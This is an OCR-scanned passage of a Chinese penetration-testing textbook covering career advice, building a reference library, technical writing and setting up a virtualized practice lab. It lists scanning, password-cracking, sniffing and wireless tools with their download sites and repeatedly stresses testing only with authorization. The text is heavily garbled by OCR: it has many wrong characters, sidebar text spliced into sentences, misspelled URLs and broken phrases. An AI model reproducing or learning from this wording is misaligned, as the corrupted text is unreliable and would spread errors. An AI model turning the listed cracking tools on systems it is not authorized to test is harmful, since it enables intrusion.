那些 没有 在 任何 层次 进行 此 类 测试 的 经 验 的 人 会 发 现 走 这 条 路 有 些 艰难 。 虽 然 有 的 安 
全 公司 可 能 愿意 聘请 经 验 不 足 的 测试 人 员 ， 并 且 只 根据 需要 进行 培训 ， 但 是 很 多 公司 不 原 
承担 将 人 员 培 训 到 足以 进行 现场 测试 的 熟练 程度 所 需 花 费 的 时 间 和 成 本 。 


自行 创业 

对 于 那些 更 富 雄 心 壮志 和 冒险 精神 的 人 而 言 ， 开 创 自己 专门 从 事 渗透 测试 的 小 型 企业 
也 是 一 个 选择 。 在 这 条 路 上 ， 可 以 从 为 当地 企业 做 测试 开始 开创 自己 的 事业 ， 并 同时 获得 
声望 和 经 验 。 这 对 于 那些 需要 灵活 性 、 主 观 能 动 性 强 ， 并 且 能 够 同时 负责 测试 和 业务 运营 
的 人 是 一 个 理想 的 选择 。 

这 条 道路 可 能 是 最 艰难 的 一 条 ， 但 是 可 以 为 那些 具备 自律 能 力 和 好 奇 心 的 主观 能 动 性 
强 的 人 提供 很 多 的 可 能 性 。 这 条 道路 将 要 求 你 自己 投入 时 间 学 习 和 研究 ， 以 寻找 答案 和 思 
路 。 笔 者 的 意见 是 ， 如 果 能 够 胜任 ， 这 是 一 条 极 好 的 道路 ， 因 为 会 有 更 多 的 机 会 探索 渗透 
测试 领域 。 当 然 ， 它 并 不 适合 所 有 人 ， 并 且 和 额外 的 正式 培训 和 体系 也 能 有 所 促进 。 无 论 如 
何 ， 都 可 以 参考 本 章 后 面 的 “展示 你 的 技能 ”一 节 。 

es 无 论 决定 选择 哪 一 条 道路 ， 都 要 记 住 ， 必 须 在 安全 领域 

和 以 便 定期 习 技术 。 建立 你 的 声望 和 信誉 。 在 测试 你 的 技能 时 ， 请 确保 已 认真 才 
技能 ， 并 在 更 为 详细 的 层 虑 过 ， 对 任何 你 不 拥有 或 有 使 用 权 目 标的 (攻击 ) 测 试 ， 可 能 让 
次 上 了 解 事 物 。 有 关 详细 你 陷入 麻烦 ， 可 能 是 法 律 上 的 麻烦 。 这 样 的 结果 可 能 会 严重 
信息 ， 请 参见 第 19 革 “ 建 ”影响 你 在 这 一 领域 的 职业 前 景 ， 在 某 些 情况 下 ， 还 可 能 影 啊 
立 涂 透 测试 实验 室 ”。 人 身 自由 。 
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笔者 强烈 建议 任何 对 渗透 测试 领域 感 兴趣 的 人 ， 建 立 一 个 可 在 需要 时 援引 的 资源 库 。 
应 考虑 在 其 中 加 入 以 下 类 型 的 书籍 或 手册 : 


Web 应 用 程序 和 Web 应 用 程序 安全 书籍 

考虑 到 需要 评估 的 许多 环境 中 不 仅 具 有 Web 服 务 器 ， 而 且 在 这 些 Web 服 务 器 上 还 运行 
着 各 种 类 型 的 Web 应 用 程序 ， 需 要 在 这 些 环境 中 使 用 经 验 和 /或 参考 资料 。 由 于 Web 应 用 程 
序 是 熟练 攻击 者 入 侵 组 织 的 最 为 简单 快捷 的 方式 之 一 ， 因 此 必须 具备 有 关 这 些 环境 的 信息 


常用 工具 (如 NMAP 和 Wireshark) 的 参考 指南 或 材料 
本 书 中 讨论 的 许多 工具 很 复杂 ， 有 很 多 选项 。 确 保 将 这 些 工具 的 手册 和 指南 加 入 书 
库 中 。 


Web 服 务 器 指南 

进行 渗透 测试 时 ， 将 遇 到 许多 需要 评估 的 Web 服 务 器 环境 。 虽 然 整个 Web 服 务 器 领 
域 浩如烟海 的 信息 都 能 找到 ， 但 笔者 推荐 ， 资 料 库 中 至 少 应 纳入 微软 的 Internet 信 息 服 务 
(IIS)、Apache， 或 许 还 应 包括 ngnx 等 几 个 常用 Web 服 务 器 的 信息 。 虽 然 还 有 其 他 的 Web 服 
务 器 ， 但 是 它们 不 太 可 能 遇 到 ， 在 大 多 数 情况 下 不 是 必需 的 。 

操作 系统 指南 


面 对 现 实 : 将 在 测试 中 过 到 一 些 操作 系统 。 因 此 ， 应 该 纳入 微软 Windows、Linux,， 
Unix 和 Mac OS 的 参考 指南 。 男 外 ， 还 需要 包含 移动 操作 系统 (如 Android、iOS 和 Windows 


Mobile) 的 参考 资料 。 
基础 设施 指南 
需要 诸如 思科 设备 之 类 的 网 络 人 硬件 (包括 路 由 器 、 交 换 机 等 ) 的 资料 。 
无 线 指南 
由 于 无 线 存 在 于 许多 不 同 的 环境 中 ， 应 该 纳入 涵 善 无 线 技术 的 材料 。 
防火 墙 指南 
可 能 需要 防火 墙 指南 用 于 参考 。 
TCP/IP 指 南 


因为 在 大 多 数 环境 中 将 使 用 IPv4 和 IPv6 协 议 ， 这 应 该 是 显而易见 的 。 


Kali Linux 人 参考 指南 

由 于 在 渗透 测试 职业 中 总 会 使 用 到 Kali Linux， 所 以 加 入 它 是 必须 的 。 

还 有 更 多 可 以 加 入 这 个 列表 的 资料 ， 你 自己 也 无 疑 会 发 现 很 多 资料 可 以 加 入 你 的 个 人 
资料 库 。 笔 者 还 建议 ， 收 集 可 能 遇 到 的 各 种 硬件 和 设备 的 指南 和 手册 。 

你 必须 自行 决定 是 使 用 印刷 还 是 电子 指南 。 笔 者 个 人 认为 ， 我 的 大 部 分 书籍 和 参考 指 
南 的 数字 版 本 都 是 更 好 的 选择 ， 因 为 它们 体积 更 小 ， 旅 行 时 我 的 肩 上 负担 更 轻 。 事 实 上 ， 
目前 笔者 携带 的 是 Google Nexus 7( 我 知道 它 已 经 很 日 了 )， 但 它 上 面 不 仅 安 装 了 工具 ， 还 安 
装 了 其 他 项 目 ， 如 包含 了 我 的 作品 的 亚马逊 的 Kindle 应 用 程序 ， 以 及 PDF 手册 、 参 考 资 料 
应 用 程序 、 字 典 和 任何 我 觉得 有 用 的 东西 。 我 喜欢 这 台 设 备 ， 因 为 它 足 够 小 ， 性 能 足够 满 
足 我 的 需要 ， 如 果 我 想 要 做 些 笔记 ， 甚 至 可 以 添加 一 个 带 键 盘 的 皮 套 (( 尽 管 键盘 较 小 )。 


18.3 练习 写作 技术 文章 


由 于 测试 结束 后 ， 必 须 编 写 报告 并 整理 调查 结果 ， 因 此 必须 在 这 两 方面 都 具备 完善 的 
技能 。 笔 者 建议 选择 一 本 书 或 参加 相关 课程 ， 学 习 如 何 进 行 技术 写作 和 报告 写作 。 画 外 ， 
还 应 学 习 如 何 有 条 理 地 写作 ， 并 完全 彻底 地 记录 ;， 许多 信息 技术 和 安全 专业 人 员 缺 乏 这 
两 项 技能 。 

最 后 ， 由 于 在 这 个 职业 领域 需要 写作 相当 大 量 的 文 要 ， 因 此 需要 将 起 词 造 名 技巧 提 
升 到 一 流 。 可 使 用 惯用 的 文字 处 理 程序 中 的 工具 ， 分 析 你 的 拼写 和 语法 ， 然 后 再 同 客 户 
发 送 报 告 。 低 级 拼写 错误 和 糖 糙 的 语法 将 带 来 负面 影响 ， 无 论 你 的 工作 在 其 他 方面 多 么 

请 记 住 ， 展 好 的 技术 写作 能 力 是 一 项 通过 后 天 培养 获得 的 技能 ， 其 至 笔者 (是 的 ， 作 
为 一 名 已 出 版 著作 的 作家 ) 的 这 项 技能 仍然 可 以 通过 练习 得 到 改善 。 事 实 上 ， 我 如 果 没 有 
这 位 极 语 才 华 的 开发 编辑 ， 处 处 为 我 修改 措辞 ， 作 品 要 失色 许多 (再 次 感谢 Kiml! )。 


18.4 ”展示 你 的 技能 


在 渗透 测试 的 世界 中 ， 学 校 教育 的 错误 或 缺乏 不 会 是 导致 你 失败 的 原因 。 然 而 ， 缺 乏 
正式 的 培训 可 能 需要 你 证 明 目 己 的 能 力 。 泣 运 的 是 ， 有 很 多 不 同 的 方法 可 以 做 到 这 一 点 : 

@ 考 碟 开设 一 个 博客 ， 在 其 中 可 以 分 语 知 识 ， 提 供 建议 或 展示 研究 内 容 和 思路 。 

@ 开设 一 个 推 特 账号 ， 在 其 上 可 以 发 布 可 能 对 其 他 人 有 用 的 连接 和 信息 。 

@ 寻找 发 布 安 全 和 渗透 测试 文章 的 杂志 。 你 可 能 需要 从 较 小 的 网 站 和 杂志 开始 ， 逐 
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渐 升 级 到 给 更 大 的 出 版 物 或 网 站 投稿 。 
@ 如 果 具 备 相关 技能 ， 可 以 参加 由 各 家 软件 开发 商 赞 助 的 bug 奖 励 计划 。 这 些 项 目 旨 
在 找 出 软件 中 的 缺陷 ， 并 回 软 件 开 及 人 员 提 供 有 关 该 问题 的 信息 ， 以 便 他 们 按 需 
解决 该 问题 。 
@ 有 机 会 时 ， 为 软件 或 硬件 厂商 撰写 白皮书 。 
@ 考虑 在 安全 会 议 或 小 组 中 作 讲 座 。DefCon 和 Black Hat 等 主要 会 议 都 提供 此 类 机 
会 。 但 是 ， 在 进行 此 类 演讲 之 前 ， 请 确保 你 已 同时 具备 技术 和 演讲 技能 。 应 考虑 
在 答 试 讲座 前 ， 先 参加 这 些 会 议 ， 以 便 准 确 评估 是 否 已 做 好 了 谁 备 。 
记 住 ， 如 条 有 能 力 证 明 上 自身 素质 ， 缺 乏 学 历 通 营 不 会 阻碍 你 的 进步 。 但 是 ， 或 许 相 
比 于 科班 出 身 的 人 ， 你 需要 在 更 大 程度 上 证 明 上 自己 。bug 基 人 营 是 证 明 实 力 的 一 个 很 好 的 
方式 ， 但 需要 花费 时 间 和 精力 ， 更 不 用 提 很 高 的 技能 要 求 了 。 值 得 使 用 一 些 分 析 框 架 如 
Metasploit 进 行 试 验 。 考 虑 塔 养 Python 或 Ruby 等 脚本 语言 开发 技能 ， 以 便 实 现 各 种 任务 的 
自动 执行 ， 甚 至 还 可 扩展 Metasploit 框 架 等 工具 的 功能 。 


18.5 ”本 登 小 结 


渗透 测试 者 可 以 是 一 项 激动 人 心 同时 回报 丰厚 的 职位 和 事业 ， 但 需要 大 量 的 工作 和 规 
划 。 由 于 技术 的 快速 变化 ， 和 世界 上 威胁 和 不 稳定 因素 的 不 断 增 加 ， 未 来 将 需要 雇佣 大 量 
渗透 测试 人 员 。 本 章 学 习 了 在 技术 工作 之 外 ， 应 如 何 积累 经 验 ， 并 为 成 为 渗透 测试 人 员 做 
好 准备 。 


1. 建立 资料 库 有 何 价值 ? 你 会 考虑 制作 一 个 电子 版 本 还 是 购买 书籍 ? 
2， 列 举 一 些 你 认为 应 不 断 更 新 测试 技能 的 原因 ? 
3. 列举 一 些 应 在 资料 库 中 保留 的 指南 ? 


下 面 以 讨论 如 何 继续 培养 技能 ， 结 束 本 书 在 渗透 测试 领域 的 探索 之 旅 。 获 得 经 验 的 最 
佳 方法 是 的 起 袖子 ， 末 自 党 试 。 和 遗憾 的 是 ， 如 果 不 小 心 的 话 很 容易 遇 到 以 烦 ， 因 为 不 能 简 
单 地 任意 选择 一 些 目标 ， 并 使 用 本 书 中 讨论 的 各 种 黑客 工具 和 技术 进行 攻击 。 这 样 做 不 仅 
有 违 道德 ， 而 且 是 违法 的 。 

因此 ， 练 习 本 书 所 涵盖 的 各 类 技术 的 最 佳 方 法 是 构建 自己 的 实验 室 环 境 。 有 了 它 ， 就 


可 以 用 工具 练习 而 不 会 触犯 法 律 。 


本 章 将 学 习 : 
名 了 解 实 验 室 的 优势 
名 ”考虑 软 硬 件 选 型 
名 ” 选 定 虚拟 化 方式 


19.1 ”决定 建 记 实验 室 


作为 一 名 渗透 测试 者 ， 并 不 能 公开 练习 自己 的 技能 ， 因 为 如 果 没 有 这 样 做 的 权限 ， 攻 
击 (公共 ) 目 标 是 非法 的 。 因 此 ， 需 要 有 一 个 可 以 在 其 中 测试 软件 和 实践 攻击 而 不 会 遇 到 麻 
烦 的 实验 室 环境 。 当 拥有 自己 的 实验 室 时 ， 即 可 通过 大 量 的 配置 和 环境 尽情 练习 。 对 于 渗 
透 测试 者 这 是 一 个 巨大 的 优势 ， 因 为 在 这 个 领域 中 会 遇 到 多 种 不 同 的 环境 ， 如 果 能 够 量 身 
定制 (虚拟 ) 环 境 以 更 晕 真 地 模拟 这 一 领域 的 真实 环境 ， 将 给 工作 市 来 立定 见 影 的 好 处 。 

在 自己 的 环境 中 测试 的 男 一 个 优点 是 ， 可 以 无 所 拘束 地 尝试 所 有 希望 实验 的 工具 和 技 
术 。 不 必 担 心 这 些 工具 或 技术 中 的 杀 种 是 否 会 导致 灾难 性 后 果 ， 如 朋 尝 或 摧毁 目标 ( 确 有 
可 能 )。 因 为 工作 在 实验 环境 中 ， 可 以 简单 地 恢复 和 重建 环境 ， 然 后 尝试 使 用 其 他 方法 。 
如 果 不 拥 有 该 环境 ， 那 束 没 这 么 容易 ， 更 考 庸 讳言 ， 在 没有 提前 获得 操作 许可 而 使 他 人 的 
环境 朋 泽 时 将 遇 到 的 巨大 麻烦 。 

最 后 ， 在 未 知 环境 中 进行 测试 时 ， 无 法 立即 确认 结果 是 否 符合 实际 。 建 立 目 己 的 实验 
室 环 境 意味 独 对 其 了 如 指 营 ， 因 此 可 以 验证 扫描 和 探测 是 人 否 得 到 了 符合 预期 的 结果 。 对 疆 
果 进 行 检查 ， 意 味 看 其 后 分 析 其 他 结果 时 将 更 容易 并 更 准确 。 

所 有 实验 室 环境 都 会 不 同 ; 可 以 有 多 种 方法 构建 实验 室 ， 所 有 这 些 方法 都 可 适用 于 测 


试 。 最 重要 的 是 ， 需 要 构建 一 个 最 适合 你 自身 需求 的 环境 ， 因 此 下 列 问题 需要 你 自己 来 
回答 : 


回答 这 些 问题 将 有 助 于 进行 概念 设计 。 请 记 住 ， 必 须 满足 特定 的 硬件 和 软件 要 求 ， 例 
如 如 内 存 、 处 理 器 或 网 络 接 入 方面 的 要 求 ， 才 能 使 系统 正 浓 运行。 为 了 更 好 地 满足 实现 目 
标 环境 所 需 的 要 求 ， 可 能 需要 参考 不 同 的 供应 商 网 站 ， 以 了 解 系统 要 求 以 及 部 普 中 所 需要 
的 参数 。 然 后 ， 需 要 整合 所 有 这 些 需 求 ， 以 使 系统 工作 。 


最 有 可 能 遇 到 何 种 操作 系统 ? 

需要 哪些 操作 系统 版 本 ? 

希望 使 用 何 种 工具 ? 

最 有 可 能 遇 到 何 种 硬件 ? 

需要 基于 何 种 配置 进行 练习 ? 

网 络 应 该 如 何 设置 ? 

需要 何 种 服务 器 环境 ? 

是 否 需 要 移动 版 操作 系统 ? 

是 否 需要 试验 类 似 活动 目录 的 技术 ? 

是 否 需要 了 解 某 些 已 知 的 漏洞 ? 

使 用 或 计划 使 用 的 工具 是 否 可 用 于 虚拟 环境 中 ? 
是 否 需 要 任何 专用 应 用 程序 ? 

是 否 需 要 模拟 一 个 用 于 实验 不 同 的 测试 方法 的 客户 端 环境 ? 


19.2 ”考虑 庶 拟 化 


建立 实验 室 坏 境 的 最 常用 方法 之 一 ， 是 使 用 一 种 称 为 虚拟 化 (virtualization) 的 技术 。 虚 
拟 化 是 IT 领 域 中 非常 第 用 的 技术 ， 用 于 将 多 台 机 器 整合 到 较 少 的 机 器 中 ， 并 隔离 系统 ， 以 
在 进行 开发 和 测试 时 获得 更 好 的 稳定 性 和 安全 性 。 虚 拟 化 非常 适合 建立 实验 室 ， 因 为 它 可 
以 快速 部 著 和 重新 配置 系统 ， 它 还 允许 建立 多 个 可 用 (系统 ) 配 置 ， 每 个 都 有 自己 的 自 定 义 
环境 ， 而 不 需要 在 屋子 里 塞 满 大 堆 物 理 计 算 机 。 相 反 ， 虚 拟 化 可 以 让 你 拥有 一 台 可 以 在 其 
上 发 布 几 个 虚拟 环境 的 笔记 本 电脑 ， 可 对 这 些 环境 进行 测试 ， 这 意味 着 所 有 内 容 都 整合 在 
一 个 便携 系统 上 。 多 人 台 物理 机 器 却 无 法 达到 同样 的 标准 。 

除了 少数 例外 ， 遇 到 的 任何 环境 几乎 都 可 以 部 署 到 虚拟 环境 中 。 通 常 的 操作 系统 ， 如 
Windows、Linux 和 Android， 以 及 本 书 中 所 讨论 的 各 种 工具 ， 都 可 以 快速 简便 地 承载 在 虚 
拟 环境 中 。 

虚拟 化 的 工作 原理 如 下 : 宿主 机 或 宿主 系统 是 物理 系统 ， 包 括 操作 系统 和 安 六 在 其 上 
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的 虚拟 化 软件 。 在 设置 好 宿主 机 并 将 虚拟 化 软件 安装 在 其 上 后 ， 即 可 在 虚拟 化 软件 之 上 安 
装 被 虚拟 化 的 环境 。 在 虚拟 化 之 上 或 其 中 承载 的 这 些 环 境 即 为 客户 机 。 客 忆 机 将 在 虚拟 系 
统 中 安装 一 个 操作 系统 ， 以 及 所 有 在 虚拟 化 环境 之 上 运行 的 捆绑 的 应 用 程序 和 工具 。 实 际 
上 , 一 个 系统 包含 一 个 物理 主机 ， 具 备 同时 运行 多 个 客户 机 的 能 力 。 在 大 多 数 情况 下 ， 
给 定 主机 可 承载 的 客户 机 数量 的 唯一 限制 是 ， 可 用 于 在 各 类 客户 机 以 及 窒 主 机 之 间 分 配 ， 
并 保证 它们 全 部 在 可 接受 的 性 能 水 平 下 运行 的 内 存 和 其 他 资源 的 数量 (这 比 听 起 来 更 为 
困难 )。 

承载 客户 机 时 ， 出 现 的 问题 之 一 是 需要 多 大 市 宽 的 访问 流量 。 在 实践 中 ， 虚 拟 化 软件 
允许 私有 网 络 连 接 ， 这 意味 看 它们 仅 限于 单 台 计算 机 ， 因 此 该 计算 机 上 的 所 有 客户 机 互相 
之 间 可 以 通信 ， 但 不 能 与 该 计算 机 外 部 通信 。 但 是 ， 和 不 存在 虚拟 化 部 分 时 一 样 ， 宿 主机 
能 够 与 外 界 网 络 进行 通信 。 也 可 以 将 网 络 配置 为 令 虚拟 机 对 虚拟 系统 中 和 系统 外 的 网 络 资 
源 均 具有 完全 访问 的 权限 。 在 这 种 情况 下 ， 客 户 机 将 像 网 络 上 的 任何 其 他 物理 主机 一 样 具 
有 相同 权限 。 除 非 仔细 检查 ， 人 否则 网 络 中 任何 位 置 的 客户 机 或 服务 顺 都 无 法 圭 觉 虚拟 系统 
与 物理 系统 的 差别 。 还 有 一 些 其 他 头 型 的 网 络 配置 ， 但 在 刚 开 始 时 ， 将 网 络 保持 私有 化 可 
能 对 攻 些 测试 有 好 处 。 如 果 不 慎 输 入 了 错误 的 人 P 或 攻击 目的 地 址 ， 或 者 由 于 测试 而 产生 大 
量 流量 ， 该 事件 的 影响 将 仅 局 限于 该 宿主 系统 ， 并 且 不 会 影响 在 此 前 后 的 任何 其 他 操作 ， 
或 导致 可 能 的 负面 结果 。 请 记 住 ， 网 络 访问 权限 可 以 随时 在 任何 客户 端 上 更 改 ;你 只 需要 
咨询 你 选择 的 虚拟 化 软件 厂商 即 可 了 解 如 何 完成 这 些 操作 。 


19.2.1 虚拟 化 的 优点 


以 下 是 虚拟 机 模式 对 渗透 测试 者 而 言 的 几 个 优点 : 

e@ 强烈 推荐 在 虚拟 环境 中 测试 恶意 软件 ， 因 为 它 可 以 极 大 地 限制 将 恶意 软件 发 布 到 
实际 环境 中 可 能 导致 的 潜在 损害 。 

@ 测试 不 同 的 服务 器 、 应 用 程序 和 配置 是 一 个 非常 吸引 人 的 选项 ， 并 且 是 使 用 虚拟 
化 构建 实验 室 的 原因 。 可 以 很 简便 地 对 多 种 环境 配置 进行 测试 ， 只 需要 关闭 客户 
机 并 将 虚拟 机 文件 从 一 个 系统 移动 到 为 一 个 系统 或 从 一 个 位 置 移动 到 为 一 个 位 
置 ， 然 后 使 用 新 配置 重新 局 动 客户 机 。 

@ 如 果 在 测试 和 实验 过 程 中 不 巧 对 客 尸 机 造成 损害 或 不 利 影响 ， 可 以 轻松 修复 。 实 
际 上 ， 在 大 多 数 情况 下 ， 只 需要 实验 之 前 简单 备份 虚拟 机 ， 即 可 在 虚拟 系统 受 损 
后 关闭 受 损 的 虚拟 系统 ， 并 将 备份 覆盖 损坏 的 文件 ， 然 后 重新 启动 曾 受 损 的 系 
统 。 这 就 是 重新 恢复 正常 运行 所 需 的 全 部 操作 。 

@ 可 以 在 安装 和 测试 新 工具 之 前 在 大 多 数 虚拟 机 中 设置 可 用 的 还 原点 或 称快 照 。 如 
打 东 些 事情 未 按 预 期 的 方式 进行 ， 只 需要 将 客户 机 回 滚 到 更 改 之 前 的 一 个 还 原 
扩 ， 然 后 即 可 再 次 进行 测试 ， 并 答 试 其 他 的 操作 或 步 又 。 

@ 虚拟 化 的 最 大 优点 之 一 是 它 比 多 个 物理 系统 便宜 得 多 。 此 外 ， 较 低 的 功 耗 、 维 护 
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要 求 及 可 移植 性 使 其 成 为 一 种 高 效 得 多 的 测试 方式 。 


19.2.2 ”虚拟 化 的 缺 后 


对 于 IT 领域 的 几乎 每 种 情况 ， 虚 拟 化 都 是 一 个 富有 吸引 力 的 选择 ;， 然而， 任何 事物 都 
有 缺点 ， 虚 拟 化 也 不 例外 。 事 实 上 ， 虚 拟 化 虽然 是 许多 问题 的 有 效 解决 方案 ， 但 不 能 将 其 
视 为 解决 任何 潜在 问题 的 万 应 灵 丹 。 以 下 是 虚拟 化 不 太 适 合 的 一 些 情 况 : 
@ 在 大 多 数 情况 下 ， 需 要 在 虚拟 环境 中 运行 的 软件 应 该 能 够 运行 得 很 好 ， 没 有 任何 
大 问题 。 然 而 ， 在 某 些 情况 下 ， 那 些 需 要 直接 访问 人 硬件 的 软件 在 虚拟 环境 中 会 出 
错 。 请 在 完全 局 用 虚拟 化 之 前 对 这 类 软件 进行 研究 。 
@ 与 一 些 软 件 在 虚拟 化 或 虚拟 环境 中 无 法 工作 类 似 ， 一 些 硬件 也 是 如 此 ， 这 类 硬件 
在 虚拟 环境 下 无 法 正 弟 工作 ， 或 是 完全 无 法 运行 。 例 如 ， 某 些 无 线 适 配器 或 蓝牙 
适配器 无 法 在 虚拟 环境 中 正常 工作 。 因 此 ， 如 果 需 要 使 用 这 些 工具 ， 可 能 需要 继 
续 使 用 物理 系统 。 
@ 虽然 不 一 定 是 使 用 虚拟 化 的 障碍 ， 但 值得 注意 的 是 ， 虚 拟 环境 在 物理 主机 上 的 硬 
件 需 求 大 于 在 一 个 物理 主机 上 直接 承载 一 个 环境 时 的 硬件 需求 。 在 内 存 和 处 理 器 
方面 的 硬件 需求 具体 会 增加 多 少 并 非 笔者 能 在 此 回答 的 问题 ， 因 为 需求 量 会 取决 
于 选择 在 特定 物理 系统 之 上 承载 的 内 容 而 有 所 不 同 。 笔 者 可 以 肯定 的 是 ， 在 虚拟 
机 上 运行 时 的 硬件 需求 将 会 高 于 操作 系统 与 便 件 一 对 一 配置 时 的 需求 。 
在 此 列 出 的 几 点 无 论 如 何 都 并 非 详尽 无 遗 。 应 针对 上 自己 的 工作 ， 依 据 所 选择 的 硬件 和 
软件 以 及 应 用 程序 和 虚拟 化 软件 ， 评 估 这 些 问 题 ， 因 为 每 种 组 合 都 可 能 改变 得 到 的 结果 。 
微软 的 Hyper-V、Oracle 的 VirtualBox 和 EMC 的 VMware 是 三 种 最 流行 的 虚拟 化 软件 。 
建立 基于 虚拟 化 的 实验 室 确 实 不 止 一 种 方法 : 这 只 是 一 个 确定 自身 需求 与 资金 文 持 能 力 的 
问题 。 请 做 好 在 找到 适合 自己 的 环境 之 前 进行 大 量 的 阅读 与 评估 的 心理 准备 。 


19.3 ”开始 行动 ， 以 及 所 需 资源 


建立 实验 室 时 ， 你 可 以 建立 一 个 必 备 事项 列表 和 一 个 希望 拥有 事项 的 列表 。 然 而 ， 无 
论 该 列表 如 何 ， 必 须 首先 建立 一 个 用 于 建立 实验 室 的 基础 环境 。 

建议 首先 回顾 一 下 之 前 在 确定 建立 实验 室 的 动机 时 上 自问 的 问题 。 然 后 了 解 具 备 吸 引力 
的 虚拟 化 软件 包 ， 并 进行 试用 ， 以 确定 一 种 适合 目 己 的 ， 然 后 即 可 从 操作 系统 、 硬 件 需求 
和 网 络 访问 等 相关 方面 开始 确定 的 基础 环境 需求 。 

请 记 住 ， 建 立 实 验 室 时 有 众多 方法 可 供 选 择 。 并 没有 一 种 放 之 四 海 而 皆 准 ， 适 合 所 有 
人 的 方法 。 但 是 ， 可 以 设置 一 些 最 低 预 期 目标 ， 并 将 其 作为 起 点 。 


19.4 


件 ， 


对 于 内 存 而 言 ， 多 多 益 善 。 理 想 情况 下 ， 用 于 安装 工具 和 测试 环境 的 任何 系统 的 
内 存 都 不 应 少 于 8GB; 否则 ， 将 牺牲 性 能 ， 并 且 某 些 时 候 将 无 法 运行 测试 所 需 的 
工具 。 虽 然 虚拟 化 可 以 使 用 更 少 的 内 存 运行 ， 但 建议 使 用 32GB 的 DDR2 内 存 来 支 
持 虚拟 化 并 获得 可 接受 的 性 能 。 

密切 关注 可 用 的 硬盘 空间 容量 。 不 需要 任何 应 用 程序 或 数据 ， 操 作 系 统 本 身 的 占 
用 即 可 快速 消耗 所 有 可 用 的 驱动 器 空间 。 因 此 ， 应 计划 适当 容量 的 驱动 器 空间 
以 用 于 页 面 文件 、 临 时 文件 中 的 应 用 程序 和 数据 的 空闲 空间 。 请 计划 至 少 1TB 的 
空间 。 

考虑 使 用 固态 硬盘 (SSD) 驱 动 器 取代 传统 (内 部 有 旋转 磁盘 ) 的 硬盘 驱动 器 。SSD 的 
性 能 比 传统 的 驱动 器 好 得 多 ， 当 运行 大 量 需 要 访问 硬盘 的 程序 时 ， 这 种 优势 会 变 
得 更 加 明显 。 

开始 考虑 需要 使 用 主机 操作 系统 。 任 何 主流 虚拟 化 软件 和 操作 系统 都 是 合适 的 ， 
但 请 记 住 ， 并 非 每 个 虚拟 化 软件 都 使 用 于 所 有 的 操作 系统 。 你 可 以 使 用 有 意 配置 
为 易 受 攻击 的 虚拟 机 ， 例 如 Metasploitable， 一 个 专 为 渗透 测试 设计 ， 而 不 是 用 于 
非 测 试 生产 环境 的 Linux 操 作 系 统 。 

检查 你 选择 的 硬件 是 否 支 持 无 线 适 配器 的 监视 模式 。 


安 必 软件 


设置 好 环境 后 ， 还 需要 确定 所 使 用 的 工具 。 本 书 已 经 讨论 了 许多 不 同类 型 的 工具 ， 可 
以 在 渗透 测试 中 使 用 它们 ， 同 时 还 有 很 多 本 书 并 未 涉及 的 其 他 工具 。 

以 下 列表 是 对 于 渗透 测试 者 必 不 可 少 的 工具 。 可 将 它们 作为 入 门 选择 ， 但 不 要 认为 必 
须 仅 使 用 这 些 工 具 。 应 该 始终 关注 搜集 可 能 补充 此 处 列表 的 攻击 。 

以 下 是 扫描 工具 : 


NMAP 
NMAP 可 以 在 其 开发 者 的 网 站 www.nmap.ore 获 取 。 由 于 该 工具 是 一 个 灵活 而 强大 的 软 
而 且 是 跨 平 台 的 ， 因 此 应 该 认真 考虑 将 它 作 为 工具 包 的 一 部 分 。 


Angry IP 

可 以 在 www.angryip.org 处 获取 ， 该 软件 是 一 种 可 以 简单 地 在 网 络 上 查找 上 线 和 下 线 主 
机 的 工具 。 虽 然 NMAP 中 的 几 个 开关 选项 也 可 代 蔡 此 工具 的 功能 ， 但 它 可 能 仍然 是 工具 包 
中 的 一 个 好 选择 。 
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以 下 是 密码 破解 工具 : 


LophtCrack 
它 可 以 从 www.l0phtcrack.com 犹 取 。 


John the Ripper 
它 可 以 从 www.openwall.conmyjohn 获 取 。 


Trinity Rescue Kit 

这 是 男 一 种 多 用 途 工 具 ， 可 用 于 在 本 地 计算 机 上 执行 密码 重 置 。 可 以 从 www. 
trinityhome.org 处 下 载 。 

以 下 是 噢 探知 : 

Wireshark 

Wireshark 是 IT 业 界 最 流行 的 数据 包 串 探 器 ， 可 从 www.wireshark.org 获 取 。 它 是 完全 可 
定制 的 ， 且 具有 丰富 的 功能 ， 同 时 拥有 大 量 在 线 和 印刷 版 的 文档 和 帮助 。Wireshark 在 这 些 
操作 系统 平台 上 具备 路 平台 的 支持 和 一 致 性 。 

Tcpdump 

它 是 一 个 流行 的 命令 行 嗅 探 器 ， 可 用 于 Unix 和 Linux 平 台 。 请 参阅 www.tcpdump.org。 

Windump 

它 是 tcpdump 的 一 个 Windows 平 台 移植 版 本 。 请 参阅 www.winpcap.ore/windump。 

以 下 是 无 线 工具 : 


Insider 
PP ”要 将 技能 提升 到 男 一 z 
环境 中 安装 Kali Linux 或 “9M。 
Parrot OS。 这 两 个 操作 系 
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统 都 是 专门 用 于 渗透 测试 co . a z 

的 。 虽 然 它们 的 覆盖 范围 该 工具 可 以 从 任何 Linux 发 行 版 的 存储 库 中 获取 
超出 了 本 书 的 深度 ,但 使 Aircrack-ng 

用 它们 是 同 专 业 测 试 痢 过 它 是 一 套用 于 定位 和 评估 无 线 网 络 的 工具 。 见 www. 
淡 惧 理 成 齐 的 让步。 alrcrack-ng.org。 


19.5 本 人 童 小 绪 


作为 渗透 测试 者 ， 现 在 应 知道 建立 实验 室 环 境 的 重要 性 。 建 立 实验 室 后 ， 无 论 是 使 用 
物理 机 还 是 虚拟 机 ， 痢 能 够 在 安全 和 隔离 的 环境 中 练习 技艺 ， 而 不 会 对 未 获得 授权 的 他 人 
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的 环境 造成 损害 。 这 样 一 个 环境 能 够 提供 几乎 无 限 的 工具 组 合 和 测试 的 可 能 性 ， 从 而 为 你 
开辟 新 的 世界 。 


19.6 “习题 


. 你 会 考虑 使 用 何 种 操作 系统 进行 虚拟 化 创建 实验 室 ， 为 什么 ? 
. 选择 虚拟 化 而 不 是 安装 物理 操作 系统 有 什么 好 处 ? 

. 使 用 虚拟 化 有 何 缺 点 ? 

. 虚拟 化 对 客户 环境 中 承载 的 应 用 程序 软件 有 限制 吗 ? 

. 建立 一 个 实验 室 环 境 有 何 好 处 ? 
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第 1 草 : 渗透 测试 简介 


1. 技术 控制 项 、 管 理 控制 项 和 物理 控制 项 。 

2 恶意 黑客 和 渗透 测试 者 的 主要 区 别 在 于 其 目的 和 获得 的 授权 ， 无 论 从 法 律 意义 上 
还 是 其 他 方面 都 是 如 此 。 渗 透 测 试 工作 者 的 工作 将 严格 按照 合同 的 规定 进行 ， 该 合同 规定 
了 何 为 违规 操作 ， 以 及 测试 结束 时 预期 渗透 测试 者 提交 的 成 果 。 

